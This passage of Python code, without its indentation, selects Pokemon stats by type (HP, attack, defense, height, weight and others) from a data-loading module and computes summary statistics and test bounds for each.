unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_attack']
stat_stats = loaddata.grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_defense']
stat_stats = loaddata.grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.grass_types['height_m']
stat_stats = loaddata.grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.grass_types['weight_kg']
stat_stats = loaddata.grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fire_types['total_points']
stat_stats = loaddata.fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['hp']
stat_stats = loaddata.fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['speed']
stat_stats = loaddata.fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['attack']
stat_stats = loaddata.fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['defense']
stat_stats = loaddata.fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_attack']
stat_stats = loaddata.fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_defense']
stat_stats = loaddata.fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fire_types['height_m']
stat_stats = loaddata.fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fire_types['weight_kg']
stat_stats = loaddata.fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.water_types['total_points']
stat_stats = loaddata.water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.water_types['hp']
stat_stats = loaddata.water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.water_types['speed']
stat_stats = loaddata.water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['attack']
stat_stats = loaddata.water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['defense']
stat_stats = loaddata.water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_attack']
stat_stats = loaddata.water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_defense']
stat_stats = loaddata.water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.water_types['height_m']
stat_stats = loaddata.water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.water_types['weight_kg']
stat_stats = loaddata.water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.electric_types['total_points']
stat_stats = loaddata.electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['hp']
stat_stats = loaddata.electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['speed']
stat_stats = loaddata.electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['attack']
stat_stats = loaddata.electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['defense']
stat_stats = loaddata.electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_attack']
stat_stats = loaddata.electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_defense']
stat_stats = loaddata.electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.electric_types['height_m']
stat_stats = loaddata.electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.electric_types['weight_kg']
stat_stats = loaddata.electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.psychic_types['total_points']
stat_stats = loaddata.psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['hp']
stat_stats = loaddata.psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['speed']
stat_stats = loaddata.psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['attack']
stat_stats = loaddata.psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['defense']
stat_stats = loaddata.psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_attack']
stat_stats = loaddata.psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_defense']
stat_stats = loaddata.psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.psychic_types['height_m']
stat_stats = loaddata.psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.psychic_types['weight_kg']
stat_stats = loaddata.psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ice_types['total_points']
stat_stats = loaddata.ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['hp']
stat_stats = loaddata.ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['speed']
stat_stats = loaddata.ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['attack']
stat_stats = loaddata.ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['defense']
stat_stats = loaddata.ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_attack']
stat_stats = loaddata.ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_defense']
stat_stats = loaddata.ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ice_types['height_m']
stat_stats = loaddata.ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ice_types['weight_kg']
stat_stats = loaddata.ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.dragon_types['total_points']
stat_stats = loaddata.dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['hp']
stat_stats = loaddata.dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['speed']
stat_stats = loaddata.dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['attack']
stat_stats = loaddata.dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['defense']
stat_stats = loaddata.dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['sp_attack']
stat_stats = loaddata.dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.dragon_types['sp_defense']
stat_stats = loaddata.dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.dragon_types['height_m']
stat_stats = loaddata.dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.dragon_types['weight_kg']
stat_stats = loaddata.dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.dark_types['total_points']
stat_stats = loaddata.dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['hp']
stat_stats = loaddata.dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['speed']
stat_stats = loaddata.dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['attack']
stat_stats = loaddata.dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['defense']
stat_stats = loaddata.dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['sp_attack']
stat_stats = loaddata.dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.dark_types['sp_defense']
stat_stats = loaddata.dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.dark_types['height_m']
stat_stats = loaddata.dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.dark_types['weight_kg']
stat_stats = loaddata.dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fairy_types['total_points']
stat_stats = loaddata.fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['hp']
stat_stats = loaddata.fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['speed']
stat_stats = loaddata.fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['attack']
stat_stats = loaddata.fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['defense']
stat_stats = loaddata.fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['sp_attack']
stat_stats = loaddata.fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fairy_types['sp_defense']
stat_stats = loaddata.fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fairy_types['height_m']
stat_stats = loaddata.fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fairy_types['weight_kg']
stat_stats = loaddata.fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.normal_types['total_points']
stat_stats = loaddata.normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['hp']
stat_stats = loaddata.normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['speed']
stat_stats = loaddata.normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['attack']
stat_stats = loaddata.normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['defense']
stat_stats = loaddata.normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['sp_attack']
stat_stats = loaddata.normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.normal_types['sp_defense']
stat_stats = loaddata.normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.normal_types['height_m']
stat_stats = loaddata.normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.normal_types['weight_kg']
stat_stats = loaddata.normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fighting_types['total_points']
stat_stats = loaddata.fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['hp']
stat_stats = loaddata.fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['speed']
stat_stats = loaddata.fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['attack']
stat_stats = loaddata.fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['defense']
stat_stats = loaddata.fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['sp_attack']
stat_stats = loaddata.fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fighting_types['sp_defense']
stat_stats = loaddata.fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fighting_types['height_m']
stat_stats = loaddata.fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fighting_types['weight_kg']
stat_stats = loaddata.fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.flying_types['total_points']
stat_stats = loaddata.flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['hp']
stat_stats = loaddata.flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['speed']
stat_stats = loaddata.flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['attack']
stat_stats = loaddata.flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['defense']
stat_stats = loaddata.flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['sp_attack']
stat_stats = loaddata.flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.flying_types['sp_defense']
stat_stats = loaddata.flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.flying_types['height_m']
stat_stats = loaddata.flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.flying_types['weight_kg']
stat_stats = loaddata.flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.poison_types['total_points']
stat_stats = loaddata.poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['hp']
stat_stats = loaddata.poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['speed']
stat_stats = loaddata.poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['attack']
stat_stats = loaddata.poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['defense']
stat_stats = loaddata.poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['sp_attack']
stat_stats = loaddata.poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.poison_types['sp_defense']
stat_stats = loaddata.poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.poison_types['height_m']
stat_stats = loaddata.poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.poison_types['weight_kg']
stat_stats = loaddata.poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ground_types['total_points']
stat_stats = loaddata.ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['hp']
stat_stats = loaddata.ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['speed']
stat_stats = loaddata.ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['attack']
stat_stats = loaddata.ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['defense']
stat_stats = loaddata.ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['sp_attack']
stat_stats = loaddata.ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ground_types['sp_defense']
stat_stats = loaddata.ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ground_types['height_m']
stat_stats = loaddata.ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ground_types['weight_kg']
stat_stats = loaddata.ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.rock_types['total_points']
stat_stats = loaddata.rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['hp']
stat_stats = loaddata.rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['speed']
stat_stats = loaddata.rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['attack']
stat_stats = loaddata.rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['defense']
stat_stats = loaddata.rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['sp_attack']
stat_stats = loaddata.rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.rock_types['sp_defense']
stat_stats = loaddata.rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.rock_types['height_m']
stat_stats = loaddata.rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.rock_types['weight_kg']
stat_stats = loaddata.rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.bug_types['total_points']
stat_stats = loaddata.bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['hp']
stat_stats = loaddata.bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['speed']
stat_stats = loaddata.bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['attack']
stat_stats = loaddata.bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['defense']
stat_stats = loaddata.bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['sp_attack']
stat_stats = loaddata.bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.bug_types['sp_defense']
stat_stats = loaddata.bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.bug_types['height_m']
stat_stats = loaddata.bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.bug_types['weight_kg']
stat_stats = loaddata.bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ghost_types['total_points']
stat_stats = loaddata.ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['hp']
stat_stats = loaddata.ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['speed']
stat_stats = loaddata.ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['attack']
stat_stats = loaddata.ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['defense']
stat_stats = loaddata.ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['sp_attack']
stat_stats = loaddata.ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ghost_types['sp_defense']
stat_stats = loaddata.ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ghost_types['height_m']
stat_stats = loaddata.ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.ghost_types['weight_kg']
stat_stats = loaddata.ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.steel_types['total_points']
stat_stats = loaddata.steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['hp']
stat_stats = loaddata.steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['speed']
stat_stats = loaddata.steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['attack']
stat_stats = loaddata.steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['defense']
stat_stats = loaddata.steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['sp_attack']
stat_stats = loaddata.steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.steel_types['sp_defense']
stat_stats = loaddata.steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.steel_types['height_m']
stat_stats = loaddata.steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.steel_types['weight_kg']
stat_stats = loaddata.steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon
elif type_set == "19":
if stat_set == "1": # stat totals
